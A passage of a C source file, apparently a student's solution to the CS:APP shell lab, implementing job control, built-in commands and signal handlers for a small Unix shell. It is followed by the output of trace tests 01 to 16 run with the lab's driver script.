char sbuf[MAXLINE];         /* for composing sprintf messages */

struct job_t {              /* The job struct */
    pid_t pid;              /* job PID */
    int jid;                /* job ID [1, 2, ...] */
    int state;              /* UNDEF, BG, FG, or ST */
    char cmdline[MAXLINE];  /* command line */
};
struct job_t jobs[MAXJOBS]; /* The job list */
/* End global variables */


/* Function prototypes */

/* Here are the functions that you will implement */
void eval(char* cmdline);
int builtin_cmd(char** argv);
void do_bgfg(char** argv);
void waitfg(pid_t pid);

void sigchld_handler(int sig);
void sigtstp_handler(int sig);
void sigint_handler(int sig);

/* Here are helper routines that we've provided for you */
int parseline(const char* cmdline, char** argv);
void sigquit_handler(int sig);

void clearjob(struct job_t* job);
void initjobs(struct job_t* jobs);
int maxjid(struct job_t* jobs);
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline);
int deletejob(struct job_t* jobs, pid_t pid);
pid_t fgpid(struct job_t* jobs);
struct job_t* getjobpid(struct job_t* jobs, pid_t pid);
struct job_t* getjobjid(struct job_t* jobs, int jid);
int pid2jid(pid_t pid);
void listjobs(struct job_t* jobs);

void usage(void);
void unix_error(char* msg);
void app_error(char* msg);
typedef void handler_t(int);
handler_t* Signal(int signum, handler_t* handler);

/*
 * main - The shell's main routine
 */
int main(int argc, char** argv)
{
    char c;
    char cmdline[MAXLINE];
    int emit_prompt = 1; /* emit prompt (default) */

    /* Redirect stderr to stdout (so that driver will get all output
     * on the pipe connected to stdout) */
    dup2(1, 2);

    /* Parse the command line */
    while ((c = getopt(argc, argv, "hvp")) != EOF) {
        switch (c) {
        case 'h':             /* print help message */
            usage();
            break;
        case 'v':             /* emit additional diagnostic info */
            verbose = 1;
            break;
        case 'p':             /* don't print a prompt */
            emit_prompt = 0;  /* handy for automatic testing */
            break;
        default:
            usage();
        }
    }

    /* Install the signal handlers */

    /* These are the ones you will need to implement */
    Signal(SIGINT, sigint_handler);   /* ctrl-c */
    Signal(SIGTSTP, sigtstp_handler);  /* ctrl-z */
    Signal(SIGCHLD, sigchld_handler);  /* Terminated or stopped child */

    /* This one provides a clean way to kill the shell */
    Signal(SIGQUIT, sigquit_handler);

    /* Initialize the job list */
    initjobs(jobs);

    /* Execute the shell's read/eval loop */
    while (1) {

        /* Read command line */
        if (emit_prompt) {
            printf("%s", prompt);
            fflush(stdout);
        }
        if ((fgets(cmdline, MAXLINE, stdin) == NULL) && ferror(stdin))
            app_error("fgets error");
        if (feof(stdin)) { /* End of file (ctrl-d) */
            fflush(stdout);
            exit(0);
        }

        /* Evaluate the command line */
        eval(cmdline);
        fflush(stdout);
        fflush(stdout);
    }

    exit(0); /* control never reaches here */
}

/*
 * eval - Evaluate the command line that the user has just typed in
 *
 * If the user has requested a built-in command (quit, jobs, bg or fg)
 * then execute it immediately. Otherwise, fork a child process and
 * run the job in the context of the child. If the job is running in
 * the foreground, wait for it to terminate and then return.  Note:
 * each child process must have a unique process group ID so that our
 * background children don't receive SIGINT (SIGTSTP) from the kernel
 * when we type ctrl-c (ctrl-z) at the keyboard.
*/
void eval(char* cmdline)
{
    char* argv[MAXARGS] = { NULL };
    int FG_BG = parseline(cmdline, argv) + 1;
    if (argv[0] == NULL)return;

    if (!builtin_cmd(argv))
    {
        sigset_t mask_all, mask_one, prev_one;
        sigfillset(&mask_all);
        sigemptyset(&mask_one);
        sigemptyset(&prev_one);
        sigaddset(&mask_one, SIGCHLD);

        pid_t fpid;
        sigprocmask(SIG_BLOCK, &mask_one, &prev_one);
        fpid = fork();
        if (!fpid)
        {
            setpgid(0, 0);
            sigprocmask(SIG_SETMASK, &prev_one, NULL);
            if (execve(argv[0], argv, environ) == -1)
            {
                printf("%s: Command not found\n", argv[0]);
                exit(0);
            }
        }
        else
        {
            sigprocmask(SIG_BLOCK, &mask_all, NULL);
            addjob(jobs, fpid, FG_BG, cmdline);
            sigprocmask(SIG_SETMASK, &mask_one, NULL);

            if (FG_BG == FG)waitfg(fpid);
            else
            {
                sigprocmask(SIG_BLOCK, &mask_all, NULL);
                int insert_jid = pid2jid(fpid);
                if (FG_BG == BG) printf("[%d] (%d) %s", insert_jid, fpid, cmdline);
            }
        }
        sigprocmask(SIG_SETMASK, &prev_one, NULL);
    }
    return;
}

/*
 * parseline - Parse the command line and build the argv array.
 *
 * Characters enclosed in single quotes are treated as a single
 * argument.  Return true if the user has requested a BG job, false if
 * the user has requested a FG job.
 */
int parseline(const char* cmdline, char** argv)
{
    static char array[MAXLINE]; /* holds local copy of command line */
    char* buf = array;          /* ptr that traverses command line */
    char* delim;                /* points to first space delimiter */
    int argc;                   /* number of args */
    int bg;                     /* background job? */

    strcpy(buf, cmdline);
    buf[strlen(buf) - 1] = ' ';  /* replace trailing '\n' with space */
    while (*buf && (*buf == ' ')) /* ignore leading spaces */
        buf++;

    /* Build the argv list */
    argc = 0;
    if (*buf == '\'') {
        buf++;
        delim = strchr(buf, '\'');
    }
    else {
        delim = strchr(buf, ' ');
    }

    while (delim) {
        argv[argc++] = buf;
        *delim = '\0';
        buf = delim + 1;
        while (*buf && (*buf == ' ')) /* ignore spaces */
            buf++;

        if (*buf == '\'') {
            buf++;
            delim = strchr(buf, '\'');
        }
        else {
            delim = strchr(buf, ' ');
        }
    }
    argv[argc] = NULL;

    if (argc == 0)  /* ignore blank line */
        return 1;

    /* should the job run in the background? */
    if ((bg = (*argv[argc - 1] == '&')) != 0) {
        argv[--argc] = NULL;
    }
    return bg;
}

/*
 * builtin_cmd - If the user has typed a built-in command then execute
 *    it immediately.
 */
int builtin_cmd(char** argv)
{
    if (!strcmp(argv[0], "quit"))
        exit(0);
    else if (!strcmp(argv[0], "jobs"))
    {
        listjobs(jobs);
        return 1;
    }
    else if (!strcmp(argv[0], "bg") || !strcmp(argv[0], "fg"))
    {
        do_bgfg(argv);
        return 1;
    }
    else if (!strcmp(argv[0], "&"))
    {
        return 1;
    }
    return 0;
}

/*
 * do_bgfg - Execute the builtin bg and fg commands
 */
void do_bgfg(char** argv)
{
    if (argv[1] == NULL)
    {
        printf("%s command requires PID or %%jobid argument\n", argv[0]);
        return;
    }

    struct job_t* job;
    int id;

    if (sscanf(argv[1], "%%%d", &id) > 0)
    {
        job = getjobjid(jobs, id);
        if (job == NULL)
        {
            printf("%%%d: No such job\n", id);
            return;
        }
    }
    else if (sscanf(argv[1], "%d", &id) > 0)
    {
        job = getjobpid(jobs, id);
        if (job == NULL)
        {
            printf("(%d): No such process\n", id);
            return;
        }
    }
    else
    {
        printf("%s: argument must be a PID or %%jobid\n", argv[0]);
        return;
    }
    if (!strcmp(argv[0], "bg"))
    {
        kill(-(job->pid), SIGCONT);
        job->state = BG;
        printf("[%d] (%d) %s", job->jid, job->pid, job->cmdline);
    }
    else
    {
        kill(-(job->pid), SIGCONT);
        job->state = FG;
        waitfg(job->pid);
    }
    return;
}

/*
 * waitfg - Block until process pid is no longer the foreground process
 */
void waitfg(pid_t pid)
{
    sigset_t mask_temp;
    sigemptyset(&mask_temp);
    while (fgpid(jobs) > 0)
        sigsuspend(&mask_temp);
    return;
}

/*****************
 * Signal handlers
 *****************/

 /*
  * sigchld_handler - The kernel sends a SIGCHLD to the shell whenever
  *     a child job terminates (becomes a zombie), or stops because it
  *     received a SIGSTOP or SIGTSTP signal. The handler reaps all
  *     available zombie children, but doesn't wait for any other
  *     currently running children to terminate.
  */
void sigchld_handler(int sig)
{
    int olderrno = errno;
    pid_t pid;
    int status;
    sigset_t mask_all, prev;

    sigfillset(&mask_all);
    while ((pid = waitpid(-1, &status, WNOHANG | WUNTRACED)) > 0)
    {
        if (WIFEXITED(status))
        {
            sigprocmask(SIG_BLOCK, &mask_all, &prev);
            deletejob(jobs, pid);
            sigprocmask(SIG_SETMASK, &prev, NULL);
        }
        else if (WIFSIGNALED(status))
        {
            struct job_t* job = getjobpid(jobs, pid);
            sigprocmask(SIG_BLOCK, &mask_all, &prev);
            printf("Job [%d] (%d) terminated by signal %d\n", job->jid, job->pid, WTERMSIG(status));
            deletejob(jobs, pid);
            sigprocmask(SIG_SETMASK, &prev, NULL);
        }
        else
        {
            struct job_t* job = getjobpid(jobs, pid);
            sigprocmask(SIG_BLOCK, &mask_all, NULL);
            printf("Job [%d] (%d) stopped by signal %d\n", job->jid, job->pid, WSTOPSIG(status));
            job->state = ST;
            sigprocmask(SIG_SETMASK, &prev, NULL);
        }
    }
    errno = olderrno;
    return;
}

/*
 * sigint_handler - The kernel sends a SIGINT to the shell whenver the
 *    user types ctrl-c at the keyboard.  Catch it and send it along
 *    to the foreground job.
 */
void sigint_handler(int sig)
{
    int olderrno = errno;
    pid_t pid = fgpid(jobs);
    if (pid != 0)
        kill(-pid, sig);
    errno = olderrno;
    return;
}

/*
 * sigtstp_handler - The kernel sends a SIGTSTP to the shell whenever
 *     the user types ctrl-z at the keyboard. Catch it and suspend the
 *     foreground job by sending it a SIGTSTP.
 */
void sigtstp_handler(int sig)
{
    int olderrno = errno;
    pid_t pid = fgpid(jobs);
    if (pid != 0)
        kill(-pid, sig);
    errno = olderrno;
    return;
}

/*********************
 * End signal handlers
 *********************/

 /***********************************************
  * Helper routines that manipulate the job list
  **********************************************/

  /* clearjob - Clear the entries in a job struct */
void clearjob(struct job_t* job) {
    job->pid = 0;
    job->jid = 0;
    job->state = UNDEF;
    job->cmdline[0] = '\0';
}

/* initjobs - Initialize the job list */
void initjobs(struct job_t* jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
        clearjob(&jobs[i]);
}

/* maxjid - Returns largest allocated job ID */
int maxjid(struct job_t* jobs)
{
    int i, max = 0;

    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid > max)
            max = jobs[i].jid;
    return max;
}

/* addjob - Add a job to the job list */
int addjob(struct job_t* jobs, pid_t pid, int state, char* cmdline)
{
    int i;

    if (pid < 1)
        return 0;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid == 0) {
            jobs[i].pid = pid;
            jobs[i].state = state;
            jobs[i].jid = nextjid++;
            if (nextjid > MAXJOBS)
                nextjid = 1;
            strcpy(jobs[i].cmdline, cmdline);
            if (verbose) {
                printf("Added job [%d] %d %s\n", jobs[i].jid, jobs[i].pid, jobs[i].cmdline);
            }
            return 1;
        }
    }
    printf("Tried to create too many jobs\n");
    return 0;
}

/* deletejob - Delete a job whose PID=pid from the job list */
int deletejob(struct job_t* jobs, pid_t pid)
{
    int i;

    if (pid < 1)
        return 0;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid == pid) {
            clearjob(&jobs[i]);
            nextjid = maxjid(jobs) + 1;
            return 1;
        }
    }
    return 0;
}

/* fgpid - Return PID of current foreground job, 0 if no such job */
pid_t fgpid(struct job_t* jobs) {
    int i;

    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].state == FG)
            return jobs[i].pid;
    return 0;
}

/* getjobpid  - Find a job (by PID) on the job list */
struct job_t* getjobpid(struct job_t* jobs, pid_t pid) {
    int i;

    if (pid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid)
            return &jobs[i];
    return NULL;
}

/* getjobjid  - Find a job (by JID) on the job list */
struct job_t* getjobjid(struct job_t* jobs, int jid)
{
    int i;

    if (jid < 1)
        return NULL;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].jid == jid)
            return &jobs[i];
    return NULL;
}

/* pid2jid - Map process ID to job ID */
int pid2jid(pid_t pid)
{
    int i;

    if (pid < 1)
        return 0;
    for (i = 0; i < MAXJOBS; i++)
        if (jobs[i].pid == pid) {
            return jobs[i].jid;
        }
    return 0;
}

/* listjobs - Print the job list */
void listjobs(struct job_t* jobs)
{
    int i;

    for (i = 0; i < MAXJOBS; i++) {
        if (jobs[i].pid != 0) {
            printf("[%d] (%d) ", jobs[i].jid, jobs[i].pid);
            switch (jobs[i].state) {
            case BG:
                printf("Running ");
                break;
            case FG:
                printf("Foreground ");
                break;
            case ST:
                printf("Stopped ");
                break;
            default:
                printf("listjobs: Internal error: job[%d].state=%d ",
                    i, jobs[i].state);
            }
            printf("%s", jobs[i].cmdline);
        }
    }
}
/******************************
 * end job list helper routines
 ******************************/


 /***********************
  * Other helper routines
  ***********************/

  /*
   * usage - print a help message
   */
void usage(void)
{
    printf("Usage: shell [-hvp]\n");
    printf("   -h   print this message\n");
    printf("   -v   print additional diagnostic information\n");
    printf("   -p   do not emit a command prompt\n");
    exit(1);
}

/*
 * unix_error - unix-style error routine
 */
void unix_error(char* msg)
{
    fprintf(stdout, "%s: %s\n", msg, strerror(errno));
    exit(1);
}

/*
 * app_error - application-style error routine
 */
void app_error(char* msg)
{
    fprintf(stdout, "%s\n", msg);
    exit(1);
}

/*
 * Signal - wrapper for the sigaction function
 */
handler_t* Signal(int signum, handler_t* handler)
{
    struct sigaction action, old_action;

    action.sa_handler = handler;
    sigemptyset(&action.sa_mask); /* block sigs of type being handled */
    action.sa_flags = SA_RESTART; /* restart syscalls if possible */

    if (sigaction(signum, &action, &old_action) < 0)
        unix_error("Signal error");
    return (old_action.sa_handler);
}

/*
 * sigquit_handler - The driver program can gracefully terminate the
 *    child shell by sending it a SIGQUIT signal.
 */
void sigquit_handler(int sig)
{
    printf("Terminating after receipt of SIGQUIT signal\n");
    exit(1);
}

实验验证

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace01.txt -s ./tsh -a "-p"
#
# trace01.txt - Properly terminate on EOF.
#

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace02.txt -s ./tsh -a "-p"
#
# trace02.txt - Process builtin quit command.
#

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace03.txt -s ./tsh -a "-p"
#
# trace03.txt - Run a foreground job.
#
tsh> quit

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace04.txt -s ./tsh -a "-p"
#
# trace04.txt - Run a background job.
#
tsh> ./myspin 1 &
[1] (8422) ./myspin 1 &

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace05.txt -s ./tsh -a "-p"
#
# trace05.txt - Process jobs builtin command.
#
tsh> ./myspin 2 &
[1] (8428) ./myspin 2 &
tsh> ./myspin 3 &
[2] (8430) ./myspin 3 &
tsh> jobs
[1] (8428) Running ./myspin 2 &
[2] (8430) Running ./myspin 3 &

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace06.txt -s ./tsh -a "-p"
#
# trace06.txt - Forward SIGINT to foreground job.
#
tsh> ./myspin 4
Job [1] (8441) terminated by signal 2

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace07.txt -s ./tsh -a "-p"
#
# trace07.txt - Forward SIGINT only to foreground job.
#
tsh> ./myspin 4 &
[1] (8447) ./myspin 4 &
tsh> ./myspin 5
Job [2] (8449) terminated by signal 2
tsh> jobs
[1] (8447) Running ./myspin 4 &

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace08.txt -s ./tsh -a "-p"
#
# trace08.txt - Forward SIGTSTP only to foreground job.
#
tsh> ./myspin 4 &
[1] (8458) ./myspin 4 &
tsh> ./myspin 5
Job [2] (8460) stopped by signal 20
tsh> jobs
[1] (8458) Running ./myspin 4 &
[2] (8460) Stopped ./myspin 5

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace09.txt -s ./tsh -a "-p"
#
# trace09.txt - Process bg builtin command
#
tsh> ./myspin 4 &
[1] (8467) ./myspin 4 &
tsh> ./myspin 5
Job [2] (8469) stopped by signal 20
tsh> jobs
[1] (8467) Running ./myspin 4 &
[2] (8469) Stopped ./myspin 5 
tsh> bg %2
[2] (8469) ./myspin 5 
tsh> jobs
[1] (8467) Running ./myspin 4 &
[2] (8469) Running ./myspin 5

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace10.txt -s ./tsh -a "-p"
#
# trace10.txt - Process fg builtin command. 
#
tsh> ./myspin 4 &
[1] (8478) ./myspin 4 &
tsh> fg %1
Job [1] (8478) stopped by signal 20
tsh> jobs
[1] (8478) Stopped ./myspin 4 &
tsh> fg %1
tsh> jobs

#
# trace11.txt - Forward SIGINT to every process in foreground process group
#
tsh> ./mysplit 4
Job [1] (8489) terminated by signal 2
tsh> /bin/ps a
    PID TTY      STAT   TIME COMMAND
   1050 tty2     Ssl+   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
   1058 tty2     Sl+    0:10 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3
   1385 tty2     Sl+    0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
   4288 pts/0    Ss     0:00 -/bin/zsh
   8486 pts/0    S+     0:00 /usr/bin/perl ./sdriver.pl -t trace11.txt -s ./tsh -a -p
   8487 pts/0    S+     0:00 ./tsh -p
   8492 pts/0    R      0:00 /bin/ps a

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace12.txt -s ./tsh -a "-p" 
#
# trace12.txt - Forward SIGTSTP to every process in foreground process group
#
tsh> ./mysplit 4
Job [1] (8507) stopped by signal 20
tsh> jobs
[1] (8507) Stopped ./mysplit 4 
tsh> /bin/ps a
    PID TTY      STAT   TIME COMMAND
   1050 tty2     Ssl+   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
   1058 tty2     Sl+    0:11 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3
   1385 tty2     Sl+    0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
   4288 pts/0    Ss     0:00 -/bin/zsh
   8504 pts/0    S+     0:00 /usr/bin/perl ./sdriver.pl -t trace12.txt -s ./tsh -a -p
   8505 pts/0    S+     0:00 ./tsh -p
   8507 pts/0    T      0:00 ./mysplit 4
   8508 pts/0    T      0:00 ./mysplit 4
   8511 pts/0    R      0:00 /bin/ps a

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace13.txt -s ./tsh -a "-p"
#
# trace13.txt - Restart every stopped process in process group
#
tsh> ./mysplit 4
Job [1] (8517) stopped by signal 20
tsh> jobs
[1] (8517) Stopped ./mysplit 4 
tsh> /bin/ps a
    PID TTY      STAT   TIME COMMAND
   1050 tty2     Ssl+   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
   1058 tty2     Sl+    0:11 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3
   1385 tty2     Sl+    0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
   4288 pts/0    Ss     0:00 -/bin/zsh
   8514 pts/0    S+     0:00 /usr/bin/perl ./sdriver.pl -t trace13.txt -s ./tsh -a -p
   8515 pts/0    S+     0:00 ./tsh -p
   8517 pts/0    T      0:00 ./mysplit 4
   8518 pts/0    T      0:00 ./mysplit 4
   8521 pts/0    R      0:00 /bin/ps a
tsh> fg %1
tsh> /bin/ps a
    PID TTY      STAT   TIME COMMAND
   1050 tty2     Ssl+   0:00 /usr/lib/gdm3/gdm-x-session --run-script env GNOME_SHELL_SESSION_MODE=ubuntu /usr/bin/gnome-session --systemd --session=ubuntu
   1058 tty2     Sl+    0:11 /usr/lib/xorg/Xorg vt2 -displayfd 3 -auth /run/user/1000/gdm/Xauthority -background none -noreset -keeptty -verbose 3
   1385 tty2     Sl+    0:00 /usr/libexec/gnome-session-binary --systemd --systemd --session=ubuntu
   4288 pts/0    Ss     0:00 -/bin/zsh
   8514 pts/0    S+     0:00 /usr/bin/perl ./sdriver.pl -t trace13.txt -s ./tsh -a -p
   8515 pts/0    S+     0:00 ./tsh -p
   8524 pts/0    R      0:00 /bin/ps a

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace14.txt -s ./tsh -a "-p"
#
# trace14.txt - Simple error handling
#
tsh> ./bogus
./bogus: Command not found
tsh> ./myspin 4 &
[1] (8667) ./myspin 4 &
tsh> fg
fg command requires PID or %jobid argument
tsh> bg
bg command requires PID or %jobid argument
tsh> fg a
fg: argument must be a PID or %jobid
tsh> bg a
bg: argument must be a PID or %jobid
tsh> fg 9999999
(9999999): No such process
tsh> bg 9999999
(9999999): No such process
tsh> fg %2
%2: No such job
tsh> fg %1
Job [1] (8667) stopped by signal 20
tsh> bg %2
%2: No such job
tsh> bg %1
[1] (8667) ./myspin 4 &
tsh> jobs
[1] (8667) Running ./myspin 4 &

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace15.txt -s ./tsh -a "-p"
#
# trace15.txt - Putting it all together
#
tsh> ./bogus
./bogus: Command not found
tsh> ./myspin 10
Job [1] (8686) terminated by signal 2
tsh> ./myspin 3 &
[1] (8688) ./myspin 3 &
tsh> ./myspin 4 &
[2] (8690) ./myspin 4 &
tsh> jobs
[1] (8688) Running ./myspin 3 &
[2] (8690) Running ./myspin 4 &
tsh> fg %1
Job [1] (8688) stopped by signal 20
tsh> jobs
[1] (8688) Stopped ./myspin 3 &
[2] (8690) Running ./myspin 4 &
tsh> bg %3
%3: No such job
tsh> bg %1
[1] (8688) ./myspin 3 &
tsh> jobs
[1] (8688) Running ./myspin 3 &
[2] (8690) Running ./myspin 4 &
tsh> fg %1
tsh> quit

➜  [/home/ywhkkx/shlab-handout] ./sdriver.pl -t trace16.txt -s ./tsh -a "-p"
#
# trace16.txt - Tests whether the shell can handle SIGTSTP and SIGINT
#     signals that come from other processes instead of the terminal.
#
tsh> ./mystop 2
Job [1] (8704) stopped by signal 20
tsh> jobs
[1] (8704) Stopped ./mystop 2
tsh> ./myint 2
Job [2] (8707) terminated by signal 2